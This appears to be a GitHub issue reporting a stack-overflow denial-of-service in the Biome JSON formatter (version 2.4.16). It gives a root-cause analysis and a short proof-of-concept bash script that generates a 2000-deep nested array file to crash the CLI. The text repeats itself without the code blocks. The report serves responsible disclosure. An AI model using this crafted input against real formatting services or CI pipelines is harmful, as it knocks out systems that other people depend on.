Environment information
What happened?
Summary
This is a confirmed variant of CVE-2026-29062 in jackson-core, where excessive JSON nesting can cause denial of service. The target is biomejs/biome (@biomejs/biome@2.4.16), implemented in Rust rather than the original Java.
An external JSON file with 1000 nested arrays formats successfully. At about 2000 nested arrays, the public biome format --write input.json CLI reaches a workspace worker stack overflow and logs a fatal Rust runtime stack overflow.
RCA
The JSON formatting path recursively descends nested arrays without enforcing a safe maximum nesting depth before worker stack exhaustion. The input is a valid JSON file consumed through the documented formatter CLI.
The external JSON file reaches the documented formatter path:
The formatter parses the file and then formats the JSON syntax tree:
let parsed = biome_json_parser::parse_json(source, JsonParserOptions::default());
let printed = biome_json_formatter::format_node(parsed.syntax());
Array formatting descends into child elements:
for element in array.elements() {
element.format().fmt(f)?;
}Each child array re-enters the same formatting path without a depth guard, so the formatter worker stack can be exhausted by a deeply nested valid JSON document.
Expected result
PoC
#!/usr/bin/env bash
set -eu
tmp="$(mktemp -d)"
trap 'rm -rf "$tmp"' EXIT
cd "$tmp"
npm init -y >/dev/null 2>&1
npm install --silent @biomejs/biome@2.4.16
python3 - <<'PY'
from pathlib import Path
for name, depth in [("safe.json", 1000), ("attack.json", 2000)]:
Path(name).write_text("[" * depth + "0" + "]" * depth)
print(f"{name}_depth={depth}")
PY
npx biome format --write safe.json
set +e
attack_output="$(npx biome format --write attack.json 2>&1)"
status=$?
set -e
printf '%s\n' "$attack_output"
echo "attack_status=$status"
printf '%s\n' "$attack_output" | grep -E "overflowed its stack|fatal runtime error: stack overflow"
Impact
Services or CI systems that run Biome formatting on untrusted JSON can have a workspace worker abort from stack overflow. This can be used to deny service in web formatters, repository scanning systems, automated code-quality checks, editor backends, or import pipelines that process user-supplied JSON files.
Expected Result
Biome should reject JSON documents that exceed a safe nesting-depth limit with a
bounded formatter/parser diagnostic. Processing an excessively nested but valid
JSON file should not overflow the workspace worker stack, abort the Rust runtime,
or terminate the formatting service.
Code of Conduct
Environment information
What happened?
Summary
This is a confirmed variant of CVE-2026-29062 in
jackson-core, where excessive JSON nesting can cause denial of service. The target isbiomejs/biome(@biomejs/biome@2.4.16), implemented in Rust rather than the original Java.An external JSON file with 1000 nested arrays formats successfully. At about 2000 nested arrays, the public
biome format --write input.jsonCLI reaches a workspace worker stack overflow and logs a fatal Rust runtime stack overflow.RCA
The JSON formatting path recursively descends nested arrays without enforcing a safe maximum nesting depth before worker stack exhaustion. The input is a valid JSON file consumed through the documented formatter CLI.
The external JSON file reaches the documented formatter path:
The formatter parses the file and then formats the JSON syntax tree:
Array formatting descends into child elements:
Each child array re-enters the same formatting path without a depth guard, so the formatter worker stack can be exhausted by a deeply nested valid JSON document.
Expected result
PoC
Impact
Services or CI systems that run Biome formatting on untrusted JSON can have a workspace worker abort from stack overflow. This can be used to deny service in web formatters, repository scanning systems, automated code-quality checks, editor backends, or import pipelines that process user-supplied JSON files.
Expected Result
Biome should reject JSON documents that exceed a safe nesting-depth limit with a
bounded formatter/parser diagnostic. Processing an excessively nested but valid
JSON file should not overflow the workspace worker stack, abort the Rust runtime,
or terminate the formatting service.
Code of Conduct